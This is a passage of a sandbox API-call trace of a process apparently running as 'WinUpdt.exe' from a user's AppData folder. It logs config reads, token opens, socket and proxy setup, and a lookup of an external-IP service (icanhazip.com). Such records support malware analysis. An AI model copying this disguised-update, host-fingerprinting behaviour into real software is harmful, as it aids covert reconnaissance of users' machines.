lpOldMode=0x2ee57c) returned 1 [0145.339] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x35c [0145.340] GetFileType (hFile=0x35c) returned 0x1 [0145.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee578) returned 1 [0145.340] GetFileType (hFile=0x35c) returned 0x1 [0145.358] GetFileSize (in: hFile=0x35c, lpFileSizeHigh=0x2ee644 | out: lpFileSizeHigh=0x2ee644*=0x0) returned 0x8c8f [0145.358] ReadFile (in: hFile=0x35c, lpBuffer=0x22438a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee600, lpOverlapped=0x0 | out: lpBuffer=0x22438a0*, lpNumberOfBytesRead=0x2ee600*=0x1000, lpOverlapped=0x0) returned 1 [0145.369] ReadFile (in: hFile=0x35c, lpBuffer=0x22438a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee49c, lpOverlapped=0x0 | out: lpBuffer=0x22438a0*, lpNumberOfBytesRead=0x2ee49c*=0x1000, lpOverlapped=0x0) returned 1 [0145.374] ReadFile (in: hFile=0x35c, lpBuffer=0x22438a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee350, lpOverlapped=0x0 | out: lpBuffer=0x22438a0*, lpNumberOfBytesRead=0x2ee350*=0x1000, lpOverlapped=0x0) returned 1 [0145.375] ReadFile (in: hFile=0x35c, lpBuffer=0x22438a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee350, lpOverlapped=0x0 | out: lpBuffer=0x22438a0*, lpNumberOfBytesRead=0x2ee350*=0x1000, lpOverlapped=0x0) returned 1 [0145.375] ReadFile (in: hFile=0x35c, lpBuffer=0x22438a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee350, lpOverlapped=0x0 | out: lpBuffer=0x22438a0*, lpNumberOfBytesRead=0x2ee350*=0x1000, lpOverlapped=0x0) returned 1 [0145.375] ReadFile (in: hFile=0x35c, lpBuffer=0x22438a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee288, lpOverlapped=0x0 | out: lpBuffer=0x22438a0*, lpNumberOfBytesRead=0x2ee288*=0x1000, lpOverlapped=0x0) returned 1 [0145.380] ReadFile (in: hFile=0x35c, lpBuffer=0x22438a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee404, lpOverlapped=0x0 | out: lpBuffer=0x22438a0*, lpNumberOfBytesRead=0x2ee404*=0x1000, lpOverlapped=0x0) returned 1 [0145.381] ReadFile (in: hFile=0x35c, lpBuffer=0x22438a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee318, lpOverlapped=0x0 | out: lpBuffer=0x22438a0*, lpNumberOfBytesRead=0x2ee318*=0x1000, lpOverlapped=0x0) returned 1 [0145.381] ReadFile (in: hFile=0x35c, lpBuffer=0x22438a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee318, lpOverlapped=0x0 | out: lpBuffer=0x22438a0*, lpNumberOfBytesRead=0x2ee318*=0xc8f, lpOverlapped=0x0) returned 1 [0145.381] ReadFile (in: hFile=0x35c, lpBuffer=0x22438a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee3d8, lpOverlapped=0x0 | out: lpBuffer=0x22438a0*, lpNumberOfBytesRead=0x2ee3d8*=0x0, lpOverlapped=0x0) returned 1 [0145.381] CloseHandle (hObject=0x35c) returned 1 [0145.382] GetCurrentProcess () returned 0xffffffff [0145.382] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee784 | out: TokenHandle=0x2ee784*=0x35c) returned 1 [0145.383] GetCurrentProcess () returned 0xffffffff [0145.383] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee784 | out: TokenHandle=0x2ee784*=0x364) returned 1 [0145.383] GetCurrentProcess () returned 0xffffffff [0145.383] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee650 | out: TokenHandle=0x2ee650*=0x368) returned 1 [0145.384] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupdt.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x2ee650 | out: lpFileInformation=0x2ee650*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0145.384] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe.config", nBufferLength=0x105, lpBuffer=0x2ee0fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe.config", lpFilePart=0x0) returned 0x40 [0145.384] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupdt.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x2ee650 | out: lpFileInformation=0x2ee650*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0145.384] GetCurrentProcess () returned 0xffffffff [0145.384] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee784 | out: TokenHandle=0x2ee784*=0x36c) returned 1 [0145.384] GetCurrentProcess () returned 0xffffffff [0145.384] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee784 | out: TokenHandle=0x2ee784*=0x370) returned 1 [0145.394] GetCurrentProcess () returned 0xffffffff [0145.394] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee54c | out: TokenHandle=0x2ee54c*=0x374) returned 1 [0145.409] GetCurrentProcess () returned 0xffffffff [0145.409] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee55c | out: TokenHandle=0x2ee55c*=0x378) returned 1 [0145.425] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x37c [0145.425] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380 [0145.428] GetCurrentProcess () returned 0xffffffff [0145.428] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee544 | out: TokenHandle=0x2ee544*=0x384) returned 1 [0145.430] GetCurrentProcess () returned 0xffffffff [0145.430] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee554 | out: TokenHandle=0x2ee554*=0x388) returned 1 [0145.433] QueryPerformanceFrequency (in: lpFrequency=0x166b80 | out: lpFrequency=0x166b80*=100000000) returned 1 [0145.433] QueryPerformanceCounter (in: lpPerformanceCount=0x2ee958 | out: lpPerformanceCount=0x2ee958*=8604175411) returned 1 [0145.436] GetCurrentProcess () returned 0xffffffff [0145.436] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee510 | out: TokenHandle=0x2ee510*=0x38c) returned 1 [0145.440] GetCurrentProcess () returned 0xffffffff [0145.440] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee520 | out: TokenHandle=0x2ee520*=0x390) returned 1 [0145.451] GetCurrentProcess () returned 0xffffffff [0145.451] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee524 | out: TokenHandle=0x2ee524*=0x394) returned 1 [0145.452] GetCurrentProcess () returned 0xffffffff [0145.452] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee534 | out: TokenHandle=0x2ee534*=0x398) returned 1 [0145.456] GetCurrentProcess () returned 0xffffffff [0145.456] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee840 | out: TokenHandle=0x2ee840*=0x39c) returned 1 [0145.462] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ed98c | out: phkResult=0x2ed98c*=0x3a0) returned 0x0 [0145.463] RegQueryValueExW (in: hKey=0x3a0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x2ed9ac, lpData=0x0, lpcbData=0x2ed9a8*=0x0 | out: lpType=0x2ed9ac*=0x1, lpData=0x0, lpcbData=0x2ed9a8*=0xe) returned 0x0 [0145.463] RegQueryValueExW (in: hKey=0x3a0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x2ed9ac, lpData=0x2265694, lpcbData=0x2ed9a8*=0xe | out: lpType=0x2ed9ac*=0x1, lpData="Client", lpcbData=0x2ed9a8*=0xe) returned 0x0 [0145.463] RegCloseKey (hKey=0x3a0) returned 0x0 [0145.857] CoTaskMemAlloc (cb=0xcc0) returned 0x7ac230 [0145.857] RasEnumConnectionsW (in: param_1=0x7ac230, param_2=0x2ee850, param_3=0x2ee854 | out: param_1=0x7ac230, param_2=0x2ee850, param_3=0x2ee854) returned 0x0 [0146.059] CoTaskMemFree (pv=0x7ac230) [0146.065] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x2ee638 | out: lpWSAData=0x2ee638) returned 0 [0146.073] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3e0 [0146.399] setsockopt (s=0x3e0, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0146.399] closesocket (s=0x3e0) returned 0 [0146.400] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3e0 [0146.556] setsockopt (s=0x3e0, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0146.556] closesocket (s=0x3e0) returned 0 [0146.556] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e0 [0146.556] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e4 [0146.557] ioctlsocket (in: s=0x3e0, cmd=-2147195266, argp=0x2ee858 | out: argp=0x2ee858) returned 0 [0146.557] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e8 [0146.557] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ec [0146.557] ioctlsocket (in: s=0x3e8, cmd=-2147195266, argp=0x2ee858 | out: argp=0x2ee858) returned 0 [0146.558] WSAIoctl (in: s=0x3e0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x2ee840, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x2ee840, lpOverlapped=0x0) returned -1 [0146.559] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2ee570, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0146.563] WSAEventSelect (s=0x3e0, hEventObject=0x3e4, lNetworkEvents=512) returned 0 [0146.563] WSAIoctl (in: s=0x3e8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x2ee840, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x2ee840, lpOverlapped=0x0) returned -1 [0146.563] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2ee570, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0146.563] WSAEventSelect (s=0x3e8, hEventObject=0x3ec, lNetworkEvents=512) returned 0 [0146.563] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4 [0146.564] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x3f4, param_3=0x3) returned 0x0 [0146.569] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x2ee86c | out: phkResult=0x2ee86c*=0x410) returned 0x0 [0146.570] RegOpenKeyExW (in: hKey=0x410, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ee81c | out: phkResult=0x2ee81c*=0x414) returned 0x0 [0146.570] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x418 [0146.570] RegNotifyChangeKeyValue (hKey=0x414, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x418, fAsynchronous=1) returned 0x0 [0146.571] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ee820 | out: phkResult=0x2ee820*=0x41c) returned 0x0 [0146.571] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x420 [0146.571] RegNotifyChangeKeyValue (hKey=0x41c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x420, fAsynchronous=1) returned 0x0 [0146.571] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ee820 | out: phkResult=0x2ee820*=0x424) returned 0x0 [0146.571] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x428 [0146.572] RegNotifyChangeKeyValue (hKey=0x424, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x428, fAsynchronous=1) returned 0x0 [0146.572] GetCurrentProcess () returned 0xffffffff [0146.572] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee814 | out: TokenHandle=0x2ee814*=0x42c) returned 1 [0146.574] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ee120 | out: phkResult=0x2ee120*=0x430) returned 0x0 [0146.574] RegQueryValueExW (in: hKey=0x430, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x2ee13c, lpData=0x0, lpcbData=0x2ee138*=0x0 | out: lpType=0x2ee13c*=0x0, lpData=0x0, lpcbData=0x2ee138*=0x0) returned 0x2 [0146.574] RegCloseKey (hKey=0x430) returned 0x0 [0147.031] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x774748 [0147.148] WinHttpSetTimeouts (hInternet=0x774748, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0147.149] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x2ee820 | out: pProxyConfig=0x2ee820) returned 1 [0147.770] CoTaskMemAlloc (cb=0x20e) returned 0x7bcd70 [0147.770] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x7bcd70, nSize=0x105 | out: lpBuffer="⪀|⠘|AN Miniport (IPv6)") returned 0x0 [0147.771] CoTaskMemFree (pv=0x7bcd70) [0147.771] CoTaskMemAlloc (cb=0x20e) returned 0x7bcd70 [0147.771] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x7bcd70, nSize=0x105 | out: lpBuffer="⪀|⠘|AN Miniport (IPv6)") returned 0x0 [0147.772] CoTaskMemFree (pv=0x7bcd70) [0147.774] EtwEventRegister () returned 0x0 [0147.811] GetCurrentProcess () returned 0xffffffff [0147.811] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee4ec | out: TokenHandle=0x2ee4ec*=0x468) returned 1 [0147.813] GetCurrentProcess () returned 0xffffffff [0147.813] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee4fc | out: TokenHandle=0x2ee4fc*=0x478) returned 1 [0147.817] SetEvent (hEvent=0x37c) returned 1 [0147.823] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x2ee76c*=0x3f4, lpdwindex=0x2ee58c | out: lpdwindex=0x2ee58c) returned 0x80010115 [0147.828] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x2ee74c*=0x3e4, lpdwindex=0x2ee56c | out: lpdwindex=0x2ee56c) returned 0x80010115 [0147.828] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x2ee74c*=0x3ec, lpdwindex=0x2ee56c | out: lpdwindex=0x2ee56c) returned 0x80010115 [0147.828] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x2ee7a0*=0x418, lpdwindex=0x2ee5bc | out: lpdwindex=0x2ee5bc) returned 0x80010115 [0147.828] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x2ee7a0*=0x420, lpdwindex=0x2ee5bc | out: lpdwindex=0x2ee5bc) returned 0x80010115 [0147.828] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x2ee7a0*=0x428, lpdwindex=0x2ee5bc | out: lpdwindex=0x2ee5bc) returned 0x80010115 [0147.829] WinHttpGetProxyForUrl (in: hSession=0x774748, lpcwszUrl="http://icanhazip.com/", pAutoProxyOptions=0x2ee730, pProxyInfo=0x2ee7a0 | out: pProxyInfo=0x2ee7a0) returned 0 [0150.443] GetCurrentProcess () returned 0xffffffff [0150.443] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee444 | out: TokenHandle=0x2ee444*=0x490) returned 1 [0150.444] GetCurrentProcess () returned 0xffffffff [0150.444] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x2ee454 | out: TokenHandle=0x2ee454*=0x1e4) returned 1 [0150.445] GetTimeZoneInformation (in: lpTimeZoneInformation=0x2ee654 | out: lpTimeZoneInformation=0x2ee654) returned 0x2 [0150.448] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x2ee4a8 | out: pTimeZoneInformation=0x2ee4a8) returned 0x2 [0150.449] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ee58c | out: phkResult=0x2ee58c*=0x1e0) returned 0x0 [0150.450] RegQueryValueExW (in: hKey=0x1e0, lpValueName="TZI", lpReserved=0x0, lpType=0x2ee5a8, lpData=0x0, lpcbData=0x2ee5a4*=0x0 | out: lpType=0x2ee5a8*=0x3, lpData=0x0, lpcbData=0x2ee5a4*=0x2c) returned 0x0 [0150.450] RegQueryValueExW (in: hKey=0x1e0, lpValueName="TZI", lpReserved=0x0, lpType=0x2ee5a8, lpData=0x226cb60, lpcbData=0x2ee5a4*=0x2c | out: lpType=0x2ee5a8*=0x3, lpData=0x226cb60*, lpcbData=0x2ee5a4*=0x2c) returned 0x0 [0150.450] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ee3e0 | out: phkResult=0x2ee3e0*=0x1dc) returned 0x0 [0150.450] RegQueryValueExW (in: hKey=0x1dc, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x2ee3fc, lpData=0x0, lpcbData=0x2ee3f8*=0x0 | out: lpType=0x2ee3fc*=0x4, lpData=0x0, lpcbData=0x2ee3f8*=0x4) returned 0x0 [0150.451] RegQueryValueExW (in: hKey=0x1dc, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x2ee3fc, lpData=0x2ee3e8, lpcbData=0x2ee3f8*=0x4 | out: lpType=0x2ee3fc*=0x4, lpData=0x2ee3e8*=0x7d7, lpcbData=0x2ee3f8*=0x4) returned 0x0 [0150.451] RegQueryValueExW (in: hKey=0x1dc, lpValueName="LastEntry", lpReserved=0x0, lpType=0x2ee3fc, lpData=0x0, lpcbData=0x2ee3f8*=0x0 | out: lpType=0x2ee3fc*=0x4, lpData=0x0, lpcbData=0x2ee3f8*=0x4) returned 0x0 [0150.451] RegQueryValueExW (in: hKey=0x1dc, lpValueName="LastEntry", lpReserved=0x0, lpType=0x2ee3fc, lpData=0x2ee3e8, lpcbData=0x2ee3f8*=0x4 | out: lpType=0x2ee3fc*=0x4, lpData=0x2ee3e8*=0x7d8, lpcbData=0x2ee3f8*=0x4) returned 0x0 [0150.451] RegQueryValueExW (in: hKey=0x1dc, lpValueName="2007", lpReserved=0x0, lpType=0x2ee3fc, lpData=0x0, lpcbData=0x2ee3f8*=0x0 | out: lpType=0x2ee3fc*=0x3, lpData=0x0, lpcbData=0x2ee3f8*=0x2c) returned 0x0 [0150.451] RegQueryValueExW (in: hKey=0x1dc, lpValueName="2007", lpReserved=0x0, lpType=0x2ee3fc, lpData=0x226cff4, lpcbData=0x2ee3f8*=0x2c | out: lpType=0x2ee3fc*=0x3, lpData=0x226cff4*, lpcbData=0x2ee3f8*=0x2c) returned 0x0 [0150.451] RegQueryValueExW (in: hKey=0x1dc, lpValueName="2008", lpReserved=0x0, lpType=0x2ee3fc, lpData=0x0, lpcbData=0x2ee3f8*=0x0 | out: lpType=0x2ee3fc*=0x3, lpData=0x0, lpcbData=0x2ee3f8*=0x2c) returned 0x0 [0150.451] RegQueryValueExW (in: hKey=0x1dc, lpValueName="2008", lpReserved=0x0, lpType=0x2ee3fc, lpData=0x226d0b4, lpcbData=0x2ee3f8*=0x2c | out: lpType=0x2ee3fc*=0x3, lpData=0x226d0b4*, lpcbData=0x2ee3f8*=0x2c) returned 0x0 [0150.451] RegCloseKey (hKey=0x1dc) returned 0x0 [0150.452] RegQueryValueExW (in: hKey=0x1e0, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x2ee580, lpData=0x0, lpcbData=0x2ee57c*=0x0 | out: lpType=0x2ee580*=0x1, lpData=0x0, lpcbData=0x2ee57c*=0x20) returned 0x0 [0150.452] RegQueryValueExW (in: hKey=0x1e0, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x2ee580, lpData=0x226d1fc, lpcbData=0x2ee57c*=0x20 | out: lpType=0x2ee580*=0x1, lpData="@tzres.dll,-670", lpcbData=0x2ee57c*=0x20) returned 0x0 [0150.452] RegQueryValueExW (in: hKey=0x1e0, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x2ee580, lpData=0x0, lpcbData=0x2ee57c*=0x0 | out: lpType=0x2ee580*=0x1, lpData=0x0, lpcbData=0x2ee57c*=0x20) returned 0x0 [0150.452] RegQueryValueExW (in: hKey=0x1e0, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x2ee580, lpData=0x226d254, lpcbData=0x2ee57c*=0x20 | out: lpType=0x2ee580*=0x1, lpData="@tzres.dll,-672", lpcbData=0x2ee57c*=0x20) returned 0x0 [0150.452] RegQueryValueExW (in: hKey=0x1e0, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x2ee580, lpData=0x0, lpcbData=0x2ee57c*=0x0 | out: lpType=0x2ee580*=0x1, lpData=0x0, lpcbData=0x2ee57c*=0x20) returned 0x0 [0150.452] RegQueryValueExW (in: hKey=0x1e0, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x2ee580, lpData=0x226d2ac, lpcbData=0x2ee57c*=0x20 | out: lpType=0x2ee580*=0x1, lpData="@tzres.dll,-671", lpcbData=0x2ee57c*=0x20) returned 0x0 [0150.453] CoTaskMemAlloc (cb=0x20c) returned 0x7bf458 [0150.453] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7bf458 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0150.454] CoTaskMemFree (pv=0x7bf458) [0150.454] CoTaskMemAlloc (cb=0x20e) returned 0x7bf458 [0150.454] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x2ee59c, pwszFileMUIPath=0x7bf458, pcchFileMUIPath=0x2ee5a0, pululEnumerator=0x2ee594 | out: pwszLanguage=0x0, pcchLanguage=0x2ee59c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x2ee5a0, pululEnumerator=0x2ee594) returned 1 [0150.458] CoTaskMemFree (pv=0x0) [0150.458] CoTaskMemFree (pv=0x7bf458) [0150.458] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x9a0001 [0150.464] CoTaskMemAlloc (cb=0x3ec) returned 0x7420b8 [0150.464] LoadStringW (in: hInstance=0x9a0001, uID=0x29e, lpBuffer=0x7420b8, cchBufferMax=500 | out: lpBuffer="(UTC+10:00) Canberra, Melbourne, Sydney") returned 0x27 [0150.464] CoTaskMemFree (pv=0x7420b8) [0150.464] FreeLibrary (hLibModule=0x9a0001) returned 1 [0150.465] CoTaskMemAlloc (cb=0x20c) returned 0x7bf458 [0150.465] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7bf458 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0150.465] CoTaskMemFree (pv=0x7bf458) [0150.465] CoTaskMemAlloc (cb=0x20e) returned 0x7bf458 [0150.465] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x2ee59c, pwszFileMUIPath=0x7bf458, pcchFileMUIPath=0x2ee5a0, pululEnumerator=0x2ee594 | out: pwszLanguage=0x0, pcchLanguage=0x2ee59c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x2ee5a0, pululEnumerator=0x2ee594) returned 1 [0150.466] CoTaskMemFree (pv=0x0) [0150.466] CoTaskMemFree (pv=0x7bf458) [0150.466] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x9a0001 [0150.466] CoTaskMemAlloc (cb=0x3ec) returned 0x7420b8 [0150.466] LoadStringW (in: hInstance=0x9a0001, uID=0x2a0, lpBuffer=0x7420b8, cchBufferMax=500 | out: lpBuffer="AUS Eastern Standard Time") returned 0x19 [0150.466] CoTaskMemFree (pv=0x7420b8) [0150.466] FreeLibrary (hLibModule=0x9a0001) returned 1 [0150.467] CoTaskMemAlloc (cb=0x20c) returned 0x7bf458 [0150.467] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7bf458 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0150.467] CoTaskMemFree (pv=0x7bf458) [0150.467] CoTaskMemAlloc (cb=0x20e) returned 0x7bf458 [0150.467] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x2ee59c, pwszFileMUIPath=0x7bf458, pcchFileMUIPath=0x2ee5a0, pululEnumerator=0x2ee594 | out: pwszLanguage=0x0, pcchLanguage=0x2ee59c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x2ee5a0, pululEnumerator=0x2ee594) returned 1 [0150.467] CoTaskMemFree (pv=0x0) [0150.467] CoTaskMemFree (pv=0x7bf458) [0150.467] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x9a0001 [0150.468] CoTaskMemAlloc (cb=0x3ec) returned 0x7420b8 